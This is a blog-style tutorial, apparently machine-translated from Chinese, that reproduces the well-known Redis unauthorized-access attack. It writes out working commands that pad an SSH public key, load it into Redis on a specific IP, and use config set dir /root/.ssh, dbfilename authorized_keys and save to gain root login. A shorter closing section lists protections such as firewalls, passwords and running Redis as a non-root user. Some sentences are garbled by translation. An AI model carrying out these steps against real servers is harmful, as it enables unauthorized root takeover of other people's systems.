foreword
I've installed on cloud services twice redis
, and each time I was prompted to attack others. ( 我是好人怎么可能会干坏事呢
) So my server must have been hacked, because it is a personal server, there is nothing important, the port is open all the year round, and the whitelist firewall is not enabled, and the most important thing is that no password is set. No wonder it was invaded every day, let’s reproduce it below.
principle
There are several ways to log in linux
, the most commonly used is 密码登陆
and RSA key 登陆
, RSA key
the login is to generate a public-private corresponding secret key, and then put the public key into the linux
system /root/.ssh/authorized_keys
file, our local client can log in by importing the corresponding private key, this is RSA key
the login Way.
But why redis
can the server's root
authority be obtained?
The above RSA key
login method is to write the public key into the file on the server side authorized_keys
, and redis
there is a persistent method to generate an RDB file, and write the public key into the file through persistence root
, authored_keys
so that the illegal public key is written In the verification file, we can log in with the corresponding private key later. ( 但是这种方式需要再redis是root启动的情况下使用,因为非root权限无法进入/root目录
)
Generate RSA key
To generate a known public and private key RSA key
, execute the following command on a server that can be logged in:
ssh-keygen -t rsa
After execution, the following two files will be generated
id_rsa
It is a private key, which is used to log in to the client;
id_rsa.pub
it is a public key, which is placed on the server;
You can first verify whether you can log in to the server through these two keys, and move id_rsa.pub
the file to /root/.ssh
the folder
cp id_rsa.pub /root/.ssh/
Then execute the following command, the public key is written to authorized_keys
the file
cat id_rsa.pub >>authorized_keys
Here, the public key method is used for login verification. After the verification is passed, save these two files, which will be used later.
install redis
root
Use the user to install redis
and enable remote access on the simulated compromised server . If you need a tutorial on installing redis, you can read this article: Install redis online on Linux
redis
Get Root
permission by
We cannot log in without knowing linux
the account password linux
, but we can try to enter root
the installation redis
, first enter the command line
As mentioned in the above principle, redis
there is a way of persistence is to generate RDB
a file, which will contain the original data. We put our public key in redis
the server, so that we can root
log in to the account through the private key.
add newline
Add id_rsa.pub
spaces before and after the file, otherwise redis
the persistence will contain some other content that does not differentiate the public key identification and will fail. Execute the following command
(echo -e '\n\n'; cat id_rsa.pub; echo -e '\n\n') > mykey.pub
The obtained mykey.pub file will be persisted in RDB
write to redis
mykey.pub
Write the file generated above to redis
, and execute the following command:
cat mykey.pub | ./redis-cli -h 111.229.209.244 -p 6379 -x set crackit
Check redis
if the value exists
Persistence
Here is the most important step, to persist the content we wrote into /root/.ssh/authorized_keys
the file, this step needs redis
to be root
enabled to operate, otherwise the file cannot be operated.
Select a persistent address
// 选择持久化的地址
config set dir /root/.ssh
// 设置持久化文件的文件名称
config set dbfilename authorized_keys
// 保存操作
save
verify
Connect by public key and import our private key file
As shown below, the login is successful
look at authorized_keys
the file
The middle part is what we passed in 公钥
. If you don’t add spaces and confuse it with other content, you may not be able to match it 秘钥
. Now that we have obtained root
the permission, you can do whatever you want. Let’s talk about how to protect against this problem.
protection
There are several necessary factors for this intrusion method
网络互通或公网访问
默认端口
没有防火墙或白名单
没有密码或者密码简单
使用root用户启动
The above problems are the most important problems that cause the root account to be obtained. As long as one or two of them do not meet the conditions, the possibility of being invaded will be greatly reduced. Therefore, according to the above factors, several protection solutions can be made:
- Close public network access
- set up firewall
- Modify the default port
- Set a complex password
root用
start with non- userredis
- use new version
redis
Non-public network access can prevent most malicious attacks. Setting up firewalls and whitelists can prevent 99%
malicious attacks from external networks. Changing the default port to a custom port can make people unable to find the redis service. Setting a password is also essential.
If you use non- root
user startup redis
to 100%
prevent this method of intrusion, because it needs to modify root
the public key file in the directory
Using the new version redis
does not allow operations without a password by default, so it can be avoided.